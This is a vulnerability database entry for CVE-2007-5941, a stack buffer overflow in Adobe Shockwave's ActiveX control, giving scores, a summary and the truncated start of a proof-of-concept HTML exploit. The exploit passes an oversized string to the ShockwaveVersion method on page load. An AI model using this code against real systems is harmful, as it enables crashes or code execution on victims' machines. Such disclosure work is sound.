10
CVSSv2

CVE-2007-5941

Published: 14/11/2007 Updated: 29/09/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in the SWCtl.SWCtl ActiveX control in Adobe Shockwave allows remote malicious users to cause a denial of service and possibly execute arbitrary code via a long argument to the ShockwaveVersion method.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

adobe shockwave player

Exploits

<html> <head> <script language="JavaScript" DEFER> function Check() { var s = "AAAA"; while (slength < 768 * 768) s=s+s; var obj = new ActiveXObject("SWCtlSWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258} objShockwaveVersion(s); } </script> </head> <body onload="J ...